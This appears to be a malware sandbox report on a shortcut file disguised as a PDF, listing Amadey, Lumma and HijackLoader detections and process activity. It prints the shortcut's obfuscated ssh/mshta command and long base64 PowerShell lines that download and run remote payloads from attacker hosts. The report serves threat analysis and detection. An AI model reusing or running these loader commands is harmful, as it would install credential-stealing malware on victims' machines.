analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | Instruction_695-18121-002_Rev.PDF.lnk |
| Full analysis: | https://app.any.run/tasks/11a68474-4e9a-4070-9b23-b8d244c9fc02 |
| Verdict: | Malicious activity |
| Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
| Analysis date: | December 04, 2024 at 18:51:43 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-ms-shortcut |
| File info: | MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x018b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\" |
| MD5: | A3CF7C78D143162733C64741467B5B90 |
| SHA1: | 2E46AE7501BF5921802C4E122FEA038332D61741 |
| SHA256: | 39FCF6143A801DE8ACBA009EF69AC4F7B533D8E1B91337547CA578F2B7117534 |
| SSDEEP: | 24:8N8PZsx/Tfff//YK/Urrt1v+/+GnWbUk9r9AAlnE3ek489+ddS9dbEQWhWUIeFIU:87TXvYKKLGnaUk9Jm3ekJ9+do9aQv5W |
MALICIOUS
EMMENHTAL loader has been detected
- powershell.exe (PID: 6172)
Run PowerShell with an invisible window
- powershell.exe (PID: 6172)
Changes powershell execution policy (Unrestricted)
- mshta.exe (PID: 7072)
Changes powershell execution policy (RemoteSigned)
- powershell.exe (PID: 6172)
Known privilege escalation attack
- dllhost.exe (PID: 5316)
LUMMA has been detected (YARA)
- msiexec.exe (PID: 7084)
Executing a file with an untrusted certificate
- H9TNZ2UK9Z6ZKMWOTFB.exe (PID: 5112)
- RstMwService.exe (PID: 4320)
Bypass execution policy to execute commands
- powershell.exe (PID: 4816)
Changes powershell execution policy (Bypass)
- msiexec.exe (PID: 7084)
HIJACKLOADER has been detected (YARA)
- H9TNZ2UK9Z6ZKMWOTFB.exe (PID: 5112)
AMADEY has been detected (SURICATA)
- explorer.exe (PID: 5696)
Connects to the CnC server
- explorer.exe (PID: 5696)
SUSPICIOUS
Probably obfuscated PowerShell command line is found
- ssh.exe (PID: 6240)
- mshta.exe (PID: 7072)
Application launched itself
- powershell.exe (PID: 6332)
- powershell.exe (PID: 6172)
Starts POWERSHELL.EXE for commands execution
- ssh.exe (PID: 6240)
- powershell.exe (PID: 6332)
- mshta.exe (PID: 7072)
- powershell.exe (PID: 6172)
- msiexec.exe (PID: 7084)
Executes script without checking the security policy
- powershell.exe (PID: 6172)
- powershell.exe (PID: 732)
The process bypasses the loading of PowerShell profile settings
- mshta.exe (PID: 7072)
- powershell.exe (PID: 6172)
BASE64 encoded PowerShell command has been detected
- powershell.exe (PID: 6172)
- msiexec.exe (PID: 7084)
Executable content was dropped or overwritten
- powershell.exe (PID: 732)
- R-Viewer.exe (PID: 6432)
- powershell.exe (PID: 4816)
Starts itself from another location
- R-Viewer.exe (PID: 6432)
Starts application with an unusual extension
- R-Viewer.exe (PID: 6156)
- R-Viewer.exe (PID: 5792)
- H9TNZ2UK9Z6ZKMWOTFB.exe (PID: 5112)
Base64-obfuscated command line is found
- msiexec.exe (PID: 7084)
- powershell.exe (PID: 6172)
Process drops legitimate windows executable
- powershell.exe (PID: 4816)
Executes application which crashes
- RstMwService.exe (PID: 4320)
Contacting a server suspected of hosting an CnC
- explorer.exe (PID: 5696)
INFO
The executable file from the user directory is run by the Powershell process
- R-Viewer.exe (PID: 6432)
- RstMwService.exe (PID: 4320)
Executable content was dropped or overwritten
- msiexec.exe (PID: 7084)
Found Base64 encoded network access via PowerShell (YARA)
- powershell.exe (PID: 4816)
Found Base64 encoded file access via PowerShell (YARA)
- powershell.exe (PID: 4816)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon |
|---|---|
| FileAttributes: | (none) |
| TargetFileSize: | - |
| IconIndex: | 11 |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | ssh.exe |
| Description: | Adobe PDF Document |
| RelativePath: | ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe |
| CommandLineArguments: | -o ProxyCommand="powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']')" . |
| IconFileName: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe |
Total processes
159
Monitored processes
26
Malicious processes
10
Suspicious processes
5
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 732 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc IAAgACAAWwBOAEUAVAAuAHMAZQByAFYASQBDAGUAcABvAGkAbgB0AE0AYQBOAGEAZwBFAHIAXQA6ADoAUwBlAEMAdQByAEkAVAB5AFAAUgBPAFQATwBDAG8ATAAgAAkACQA9ACAACQBbAE4AZQB0AC4AcwBFAGMAdQBSAGkAdABZAHAAUgBPAFQATwBjAG8ATABUAFkAcABFAF0AOgA6AFQAbABzACwAIAAgAFsAbgBlAFQALgBzAEUAQwBVAHIASQBUAHkAUABSAE8AVABPAEMATwBMAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAxACwAIAAJAFsAbgBlAFQALgBzAGUAQwBVAFIAaQB0AHkAUABSAE8AVABPAEMATwBsAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACwAIAAJAFsAbgBlAHQALgBzAEUAQwB1AHIAaQB0AHkAcABSAG8AVABvAGMAbwBsAHQAeQBwAEUAXQA6ADoAUwBzAGwAMwAgACAAOwAgAAkAIABbAG4ARQBUAC4AUwBFAHIAVgBpAEMARQBQAG8AaQBuAFQATQBBAE4AYQBnAGUAUgBdADoAOgBTAGUAQwBVAFIAaQB0AHkAUAByAE8AdABPAGMAbwBsACAACQA9ACAACQAJACcAVABsAHMALAAgAAkAVABsAHMAMQAxACwAIAAgAAkAVABsAHMAMQAyACwAIAAJAFMAcwBsADMAJwAgACAACQA7ACAAIAAJAGkAZQB4ACgAIAAgACAASQB3AHIAIAAJAAkAKABbAGMAaABhAFIAXQAgACAACQAwAFgANgA4ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAYQBSAF0AIAAgAAkAMABYADcANAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAcgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAFIAXQAgACAACQAwAHgANwAwACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAYwBIAGEAcgBdACAAIAAJADAAWAAzAEEAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQBSAF0AIAAgAAkAMABYADIARgAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAcgBdACAAIAAJADAAWAA3ADAAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAHIAXQAgACAACQAwAHgANgAxACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAYQByAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAQwBIAEEAUgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABBAHIAXQAgACAACQAwAHgANgA1ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMABYADYAMgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAWAA2ADkAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAHgANgBFACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAQQByAF0AIAAgAAkAMABYADIARQAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAUgBdACAAIAAJADAAeAA2ADMAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAHIAXQAgACAACQAwAHgANgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMAB4ADYARAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAAyAEYAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAFgANwAyACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQByAF0AIAAgAAkAMAB4ADYAMQAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAA3ADcAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAYQByAF0AIAAgAAkAMAB4ADMAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBIAEEAcgBdACAAIAAJADAAWAA3ADYAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABBAFIAXQAgACAACQAwAFgAMwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMABYADUANgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAeAA2ADgAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABBAFIAXQAgACAACQAwAFgANwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAYQBSAF0AIAAgAAkAMABYADcAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBoAGEAcgBdACAAIAAJADAAeAA2ADIAIAAgAAkAKQApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1536 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1684 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | more.com | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3508 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4044 | C:\WINDOWS\SysWOW64\more.com | C:\Windows\SysWOW64\more.com | — | R-Viewer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: More Utility Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4320 | "C:\Users\admin\AppData\Local\924b61ec-4c7d-42ec-a52b-42fa6fb5975b\RstMwService.exe" | C:\Users\admin\AppData\Local\924b61ec-4c7d-42ec-a52b-42fa6fb5975b\RstMwService.exe | powershell.exe | ||||||||||||
User: admin Company: ManyCam LLC Integrity Level: HIGH Description: ManyCam Virtual Webcam Exit code: 3221225794 Version: 2, 6, 0, 55 Modules
| |||||||||||||||
| 4816 | powershell -exec bypass -Enc JABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAIAA9ACAAewAKACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwAKAAoAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgAzADYAMAAuAG4AZQB0ACIAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYgBhAGkAZAB1AC4AYwBvAG0AIgApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAuAEMAbABvAHMAZQAoACkACgAKACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAKAAoAIAAgACAAIAAkAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmACAAPQAgACIAaAB0AHQAcABzADoALwAvAGsAbABpAHAAZABhAGoAZQBtAHUAYQAwAC4AcwBoAG8AcAAvAGkAbgB0AF8AYwBsAHAAXwBpAG4AdABlAHIALgB0AHgAdAAiAAoAIAAgACAAIAAkAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAKACAAIAAgACAAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAIAA9ACAAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmACkACgAKACAAIAAgACAAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACAAIAAgACAAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAuAFcAcgBpAHQAZQAoACQAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmACwAIAAwACwAIAAkAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAuAEwAZQBuAGcAdABoACkACgAgACAAIAAgACQAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYALgBTAGUAZQBrACgAMAAsACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkACgAKACAAIAAgACAAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmACAAPQAgAFsAUwB5AHMAdABlAG0ALgBHAHUAaQBkAF0AOgA6AE4AZQB3AEcAdQBpAGQAKAApAC4AVABvAFMAdAByAGkAbgBnACgAKQAKACAAIAAgACAAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEMAbwBtAGIAaQBuAGUAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEALAAgACQAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgApAAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsAAoACgAgACAAIAAgACQAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEMAbwBtAGIAaQBuAGUAKAAkAGUAbgB2ADoAVABFAE0AUAAsACAAIgAkAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYALgB6AGkAcAAiACkACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAsACAAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAuAFQAbwBBAHIAcgBhAHkAKAApACkACgAKACAAIAAgACAAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAKACAAIAAgACAAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmACAAPQAgACQAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYALgBOAGEAbQBlAFMAcABhAGMAZQAoACQAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmACkACgAgACAAIAAgACQAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmACAAPQAgACQAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYALgBOAGEAbQBlAFMAcABhAGMAZQAoACQAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgApAAoACgAgACAAIAAgACQAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAC4AQwBvAHAAeQBIAGUAcgBlACgAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAC4ASQB0AGUAbQBzACgAKQAsACAAMgAwACkACgAKACAAIAAgACAAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAALQBQAGEAdABoACAAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmACAALQBGAGkAbAB0AGUAcgAgACoALgBlAHgAZQAgAC0AUgBlAGMAdQByAHMAZQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAgAGkAbgAgACQAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmA